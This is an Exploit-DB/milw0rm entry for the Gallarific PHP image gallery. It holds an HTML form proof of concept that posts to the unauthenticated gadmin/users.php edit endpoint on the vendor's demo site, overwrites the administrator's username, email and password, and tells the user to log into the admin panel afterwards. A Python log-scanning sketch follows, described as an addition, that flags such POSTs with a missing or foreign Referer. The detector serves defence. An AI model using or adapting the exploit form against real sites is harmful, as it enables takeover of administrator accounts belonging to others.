Gallarific - 'user.php' Arbitrary Change Admin Information

EDB-ID: 8796
CVE: N/A
Author: TiGeR-Dz
Type: webapps
Platform: PHP
Published: 2009-05-26

 <html>
 <title> gallarific exploit </title>
 <body bgcolor="#000000">

 <div id="content">
  <h2><font color="#FFFFFF">change password </font></h2>
  <form enctype="multipart/form-data" action="http://www.gallarific.com/demo/gadmin/users.php?task=edit&id=13" method="post" onsubmit="return userFormCheck()">
  <input type="hidden" name="id" value="13">
  <div id="error" class="er" style="display:none"></div>
  <table class="fm" width="408">
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5">
  Founder :</font></td>
  <td class="fc"><input type="text" name="username" id="username" class="if" value="TiGeR-Dz"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5">&nbsp;Email:</font></td>
  <td class="fc"><input type="text" name="email" id="email" class="if" value="tiger.dz@live.com.com"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font size="5" color="#FFFFFF">Script:</font></td>
  <td class="fc">
  <input type="text" name="password" id="password" class="if" value="gallarific php image gallery software" size="31"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5">
  HOME</font></td>
  <td class="fc"><font size="4" color="#FFFFFF">http://www.gallarific.com/</font></td>
  </tr>
  </table>
  <p align="center"><input class="su" type="submit" value="Go to change password &raquo;"></p>
  <p><font color="#FFFFFF" size="4">Note:after change password go to 
  login in control admin panel :</font></p>
  <p><font size="4" color="#FFFFFF">http://www.gallarific.com/demo/gadmin/index.php</font></p>
  <p align="center">&nbsp;</p>
  <p align="center">&nbsp;</p>
  </form>
  </div>
 <div id="help">
  &nbsp;</div>
 <br>
</body>
</html>

# milw0rm.com [2009-05-26]
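
Detection sketch for the request the form above sends, as an added example that is not part of the original advisory or of Gallarific: it scans web access logs for POSTs to gadmin/users.php?task=edit whose Referer is missing or points to another host. Assumptions: logs are in Apache/nginx "combined" format, the gallery is served from the placeholder host gallery.example, and the function name and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# combined format: ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)

def suspicious_user_edits(lines, site_host):
    """Return (ip, user id, reason) for POSTs to gadmin/users.php?task=edit
    that were not submitted from a page on site_host (hypothetical helper)."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "POST":
            continue
        target = urlsplit(m["target"])
        query = parse_qs(target.query)
        if not target.path.endswith("/gadmin/users.php"):
            continue
        if query.get("task") != ["edit"]:
            continue
        referer = m["referer"]
        ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
        if ref_host is None:
            reason = "no referer"
        elif ref_host.lower() != site_host.lower():
            reason = "foreign referer " + ref_host
        else:
            continue  # edit submitted from the admin panel itself
        hits.append((m["ip"], query.get("id", ["?"])[0], reason))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '203.0.113.7 - - [26/May/2009:10:01:12 +0000] "POST /demo/gadmin/users.php?task=edit&id=13 HTTP/1.1" 302 - "http://other.example/poc.html" "Mozilla/5.0"',
    '198.51.100.4 - - [26/May/2009:10:02:40 +0000] "POST /demo/gadmin/users.php?task=edit&id=13 HTTP/1.1" 200 512 "http://gallery.example/demo/gadmin/users.php?task=edit&id=13" "Mozilla/5.0"',
    '203.0.113.9 - - [26/May/2009:10:03:05 +0000] "POST /demo/gadmin/users.php?task=edit&id=1 HTTP/1.1" 302 - "-" "curl/7.19"',
    '198.51.100.4 - - [26/May/2009:10:04:00 +0000] "GET /demo/gadmin/users.php?task=edit&id=13 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_user_edits(SAMPLE, "gallery.example"):
        print(hit)
```

Referer is client-controlled, so hits are leads for review and an empty result does not show that the endpoint was untouched.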